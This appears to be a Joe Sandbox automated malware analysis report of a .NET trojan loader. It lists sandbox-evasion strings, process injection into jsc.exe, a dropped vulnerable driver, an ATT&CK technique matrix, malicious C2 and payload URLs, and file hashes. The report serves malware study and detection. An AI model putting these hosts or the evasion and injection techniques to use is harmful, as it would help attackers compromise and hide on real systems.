            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\file.exe TID: 7068Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 4672Thread sleep count: 9612 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-5847
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-6027
            Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\?????.sysJump to dropped file
            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 9612Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeEvaded block: after key decisiongraph_2-5688
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeAPI coverage: 4.4 %
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeAPI call chain: ExitProcess graph end nodegraph_2-6029
            Source: jsc.exe, 00000002.00000002.492997621.0000000000E50000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMware
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: jsc.exe, 00000002.00000002.492997621.0000000000E50000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Chrome/HEADIsWow64Processkernel32X:\Windows\SysWOW64\ntdll.dllntdll.dllRtlInitUnicodeStringZwOpenFileZwCreateSectionZwMapViewOfSectionNtUnmapViewOfSectionNtQueryInformationProcess{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}RtlRandomExntdll:y--\Driver\Device ParametersEDID(IsActive)(NotActive)BAD EDID!No EDID!--Nm:SYSTEM\ControlSet001\Enum\DISPLAY\\.\PhysicalDrive%d---VMwareVirtualBoxVBoxQEMUDisplay AdapterNon-PnPVMwareVirtualBoxVBoxQEMUWestern Disk HARDDISK(1):(2):text/*Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: file.exe, 00000000.00000002.493218018.000001F6C5BD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_00405700 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00405700
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_00402CB0 _memset,_memset,_wcscpy_s,_wcscat_s,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,GetLastError,LoadLibraryW,GetProcAddress,_wcschr,_wcscpy_s,GetComputerNameW,CredUIParseUserNameW,CoTaskMemFree,2_2_00402CB0
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_004039C0 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,2_2_004039C0
            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_00407219 SetUnhandledExceptionFilter,2_2_00407219
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_00405700 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00405700
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_0040C52A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040C52A

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 40D000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 413000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 416000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 418000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: B12008Jump to behavior
            Source: file.exe, ????????/???????????.csReference to suspicious API methods: ('???????????', 'GetProcAddress@kernel32.dll'), ('????????', 'LoadLibrary@kernel32.dll'), ('?????????', 'VirtualProtect@kernel32.dll'), ('????????????', 'VirtualAlloc@kernel32.dll')
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_00402050 _memset,_memset,_memset,_memset,_memset,__wcsicmp,__wcsicmp,__wcsicmp,SetEnvironmentVariableW,_memset,_wcscpy_s,_wcscat_s,CreateProcessW,GetLastError,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,__wcsicmp,_wcscpy_s,_memset,_memset,_memset,CreateProcessWithLogonW,GetLastError,EnumWindows,Sleep,Sleep,EnumWindows,CloseHandle,CloseHandle,CloseHandle,LoadIconW,LoadIconW,LoadIconW,LoadCursorW,RegisterClassExW,CreateDialogParamW,GetMessageW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetMessageW,LocalFree,2_2_00402050
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: GetLocaleInfoA,2_2_0040B123
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_0040C66D cpuid 2_2_0040C66D
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_00407ACC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_00407ACC
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exeCode function: 2_2_004039C0 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,2_2_004039C0
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            1
            Valid Accounts
            13
            Native API
            1
            Valid Accounts
            1
            Valid Accounts
            1
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/Job2
            Windows Service
            1
            Exploitation for Privilege Escalation
            1
            Valid Accounts
            LSASS Memory121
            Security Software Discovery
            Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)2
            LSASS Driver
            11
            Access Token Manipulation
            1
            Disable or Modify Tools
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)2
            Windows Service
            21
            Virtualization/Sandbox Evasion
            NTDS21
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput CaptureScheduled Transfer1
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon Script211
            Process Injection
            11
            Access Token Manipulation
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.common2
            LSASS Driver
            211
            Process Injection
            Cached Domain Credentials34
            System Information Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Deobfuscate/Decode Files or Information
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            Obfuscated Files or Information
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            file.exe46%ReversingLabsWin64.Trojan.Pwsx
            file.exe56%VirustotalBrowse
            file.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\?????.sys0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd0%URL Reputationsafe
            https://www.sysinternals.com00%URL Reputationsafe
            http://5.42.94.1690%Avira URL Cloudsafe
            http://5.42.94.169/customer/368100%Avira URL Cloudmalware
            http://5.42.94.1698%VirustotalBrowse
            http://5.42.94.169/customer/3689%VirustotalBrowse
            http://109.206.241.33/files/Hadi.config.CfgEncFileMZ0%VirustotalBrowse
            http://109.206.241.33/files/Hadi.config.CfgEncFileMZ100%Avira URL Cloudmalware
            No contacted domains info
            NameMaliciousAntivirus DetectionReputation
            http://5.42.94.169/customer/368true
            • 9%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://www.sysinternals.comjsc.exefalse
              high
              http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmdfile.exe, 00000000.00000002.495389743.000001F6D7691000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.493841709.000001F6C77A3000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://109.206.241.33/files/Hadi.config.CfgEncFileMZjsc.exe, 00000002.00000002.492997621.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, jsc.exe, 00000002.00000002.493023944.0000000000E66000.00000040.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://5.42.94.169file.exe, 00000000.00000002.493841709.000001F6C7685000.00000004.00000800.00020000.00000000.sdmpfalse
              • 8%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.493841709.000001F6C7685000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://www.sysinternals.com0file.exe, 00000000.00000002.493841709.000001F6C76CC000.00000004.00000800.00020000.00000000.sdmp, ?????.sys.0.drfalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                5.42.94.169
                unknownRussian Federation
                39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUfalse
                Joe Sandbox Version:37.1.0 Beryl
                Analysis ID:882700
                Start date and time:2023-06-06 17:13:55 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 7m 0s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:3
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:file.exe
                Detection:MAL
                Classification:mal100.troj.expl.evad.winEXE@5/2@0/1
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 28.5% (good quality ratio 26.2%)
                • Quality average: 72.8%
                • Quality standard deviation: 31.3%
                HCA Information:
                • Successful, ratio: 76%
                • Number of executed functions: 20
                • Number of non-executed functions: 30
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                TimeTypeDescription
                17:14:52API Interceptor62x Sleep call for process: file.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                5.42.94.169SecuriteInfo.com.Heur.20230606132832680639403.rtfGet hashmaliciousFormBookBrowse
                • 5.42.94.169/customer/575
                file.exeGet hashmaliciouslgoogLoaderBrowse
                • 5.42.94.169/customer/367
                rSBH388HCS009577EISATBL2023000250.exeGet hashmaliciousUnknownBrowse
                • 5.42.94.169/customer/163
                SecuriteInfo.com.Win64.PWSX-gen.13965.6561.exeGet hashmaliciousFormBookBrowse
                • 5.42.94.169/customer/275
                file.exeGet hashmaliciousVidarBrowse
                • 5.42.94.169/customer/174
                file.exeGet hashmaliciouslgoogLoaderBrowse
                • 5.42.94.169/customer/107
                file.exeGet hashmaliciousUnknownBrowse
                • 5.42.94.169/customer/71
                CAPZcbB8DM.exeGet hashmaliciousFormBookBrowse
                • 5.42.94.169/customer/49
                rIMG-2023052224.exeGet hashmaliciousFormBookBrowse
                • 5.42.94.169/customer/14
                rMerchantReportBYDocDT.exeGet hashmaliciousUnknownBrowse
                • 5.42.94.169/customer/178
                qoqfBIFsEW.exeGet hashmaliciousUnknownBrowse
                • 5.42.94.169/customer/183
                kbjQlQEZ4E.exeGet hashmaliciousUnknownBrowse
                • 5.42.94.169/customer/184
                IMG-20230529-WA0004470000000400000000002023.exeGet hashmaliciousFormBookBrowse
                • 5.42.94.169/customer/156
                PURCHASE ORDER_PDF_______________________..exeGet hashmaliciousFormBookBrowse
                • 5.42.94.169/customer/185
                Zahlungsbeleg.exeGet hashmaliciousFormBookBrowse
                • 5.42.94.169/customer/177
                SecuriteInfo.com.Variant.Tedy.374033.1533.27865.exeGet hashmaliciousRedLineBrowse
                • 5.42.94.169/customer/115
                SecuriteInfo.com.MSIL.Agent.TXGD.tr.dldr.26263.6028.exeGet hashmaliciousRedLineBrowse
                • 5.42.94.169/customer/118
                rIMG-20230601-WA0004470000000400000000002023.exeGet hashmaliciousFormBookBrowse
                • 5.42.94.169/customer/105
                BbD734ZE76.exeGet hashmaliciouslgoogLoaderBrowse
                • 5.42.94.169/customer/96
                zQkj8N8vpa.exeGet hashmaliciouslgoogLoaderBrowse
                • 5.42.94.169/customer/95
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUSecuriteInfo.com.Heur.20230606132832680639403.rtfGet hashmaliciousFormBookBrowse
                • 5.42.94.169
                s7yGw1M6VE.exeGet hashmaliciousRedLineBrowse
                • 45.15.157.14
                file.exeGet hashmaliciouslgoogLoaderBrowse
                • 5.42.94.169
                file.exeGet hashmaliciousMinerDownloader, RedLine, SystemBC, Vidar, XmrigBrowse
                • 5.42.95.122
                rSBH388HCS009577EISATBL2023000250.exeGet hashmaliciousUnknownBrowse
                • 5.42.94.169
                SecuriteInfo.com.Win64.PWSX-gen.13965.6561.exeGet hashmaliciousFormBookBrowse
                • 5.42.94.169
                file.exeGet hashmaliciousVidarBrowse
                • 5.42.94.169
                6OYe8LzpcJ.exeGet hashmaliciousUnknownBrowse
                • 5.42.64.41
                file.exeGet hashmaliciouslgoogLoaderBrowse
                • 5.42.94.169
                kZ1F8qth8R.elfGet hashmaliciousMiraiBrowse
                • 5.42.95.232
                wC9lxAF181.elfGet hashmaliciousMiraiBrowse
                • 5.42.95.232
                file.exeGet hashmaliciousUnknownBrowse
                • 5.42.94.169
                CAPZcbB8DM.exeGet hashmaliciousFormBookBrowse
                • 5.42.94.169
                rIMG-2023052224.exeGet hashmaliciousFormBookBrowse
                • 5.42.94.169
                rMerchantReportBYDocDT.exeGet hashmaliciousUnknownBrowse
                • 5.42.94.169
                qoqfBIFsEW.exeGet hashmaliciousUnknownBrowse
                • 5.42.94.169
                kbjQlQEZ4E.exeGet hashmaliciousUnknownBrowse
                • 5.42.94.169
                IMG-20230529-WA0004470000000400000000002023.exeGet hashmaliciousFormBookBrowse
                • 5.42.94.169
                PURCHASE ORDER_PDF_______________________..exeGet hashmaliciousFormBookBrowse
                • 5.42.94.169
                Zahlungsbeleg.exeGet hashmaliciousFormBookBrowse
                • 5.42.94.169
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Local\Temp\?????.sysfile.exeGet hashmaliciouslgoogLoaderBrowse
                  file.exeGet hashmaliciouslgoogLoaderBrowse
                    file.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                      file.exeGet hashmaliciousUnknownBrowse
                        file.exeGet hashmaliciouslgoogLoaderBrowse
                          file.exeGet hashmaliciousUnknownBrowse
                            file.exeGet hashmaliciousRedLineBrowse
                              file.exeGet hashmaliciousUnknownBrowse
                                file.exeGet hashmaliciousRedLineBrowse
                                  file.exeGet hashmaliciousRedLineBrowse
                                    file.exeGet hashmaliciousCinoshi StealerBrowse
                                      file.exeGet hashmaliciousSnake KeyloggerBrowse
                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                          file.exeGet hashmaliciousBitRATBrowse
                                            file.exeGet hashmaliciousRedLineBrowse
                                              file.exeGet hashmaliciousRedLineBrowse
                                                file.exeGet hashmaliciousUnknownBrowse
                                                  file.exeGet hashmaliciousBitRATBrowse
                                                    file.exeGet hashmaliciouslgoogLoaderBrowse
                                                      file.exeGet hashmaliciousRedLineBrowse
                                                        Process:C:\Users\user\Desktop\file.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1595
                                                        Entropy (8bit):5.378294470225564
                                                        Encrypted:false
                                                        SSDEEP:48:MxHKn1qHGiD0HKeGiYHKGD8AoiHd+vxpNStHTG1hAHKKPz:iqnwmI0qerYqGgAoi0ZPStzG1eqKPz
                                                        MD5:3D4F5C31B249A99B5AC79BB49D9894F3
                                                        SHA1:C7F66B88EB5A896E235CB6C37CC752C225119173
                                                        SHA-256:472C344E0D0AB687ED38440FCE12C0E010957CF27C4514710C0683F15DC0DEC5
                                                        SHA-512:CF6805ACC8DAEBFB21DC467BF533D6D68BC9EF5BED519D1DF0833BFB5E982E54828702A672EBD971EFE4FC7B828818B8DB57FAC70B673AA5A884B5AB9130CA1E
                                                        Malicious:true
                                                        Reputation:low
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neut
                                                        Process:C:\Users\user\Desktop\file.exe
                                                        File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36208
                                                        Entropy (8bit):6.284053631838433
                                                        Encrypted:false
                                                        SSDEEP:768:tKCM0IWRhm8LiES4cT4iZ923OMqUD6Q4KICJw4:t7/Vhzb3pL4GJw4
                                                        MD5:97E3A44EC4AE58C8CC38EEFC613E950E
                                                        SHA1:BC47E15537FA7C32DFEFD23168D7E1741F8477ED
                                                        SHA-256:440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C
                                                        SHA-512:8EF7FC489B6FFED9EC14746E526AE87F44C39D5EAFFF0D4C3BFA0B3F0D28450F76D1066F446C766F4C9A20842A7F084FE4A9F94659D5487EA88959FCCB2A96EB
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: PUA_VULN_Driver_Sysinternalswwwsysinternalscom_procexpsys_ProcessExplorer_HoEP, Description: Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 97e3a44ec4ae58c8cc38eefc613e950e.bin, Source: C:\Users\user\AppData\Local\Temp\?????.sys, Author: Florian Roth
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w.{.w.{.w.{.~...p.{.w.z.H.{.~...t.{.~...t.{.~...t.{."...v.{."..v.{.".y.v.{.Richw.{.........PE..d...l..a.........." .....L..........X.......................................................................................................x...(............`.......l..p!......0....I..T............................................@...............................text....%.......&.................. ..h.rdata.......@.......*..............@..H.data...,....P.......:..............@....pdata.......`.......<..............@..HPAGE.........p.......@.............. ..`INIT.................\.............. ..b.rsrc................f..............@..B.reloc..0............j..............@..B................................................................................................................................................................................................
                                                        File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):5.697202938635302
                                                        TrID:
                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                        • DOS Executable Generic (2002/1) 0.92%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:file.exe
                                                        File size:30720
                                                        MD5:daf761fb9aaa34a9c2120003694d88a3
                                                        SHA1:47fd2695b6da26f6444799d442662b982d70f783
                                                        SHA256:18d4850a10812f3b4d8631939d469b41c1d344a7fa9205acc31b265d0600291b
                                                        SHA512:1ddf3c0b4dcbb4103d24b6a5bb3308dff706c9d9277d411be3f9356e9040e67b04c0c02c9c927ba60c5723a50d746287de34cff5545003a0aed3596ec13fd7b2
                                                        SSDEEP:768:uwVMApolbUGPPMdwdunhdH15FIU/ogyejq:bVLoljn8nhj5FF1jq
                                                        TLSH:68D20800A3F98767EAFB4BF64871124447BA7ABB7936E75D0DC460DB1A637404A01BA3
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Lx}d.........."...0.Uk............... ....@...... ....................................`................................
                                                        Icon Hash:90cececece8e8eb0
                                                        Entrypoint:0x400000
                                                        Entrypoint Section:
                                                        Digitally signed:false
                                                        Imagebase:0x400000
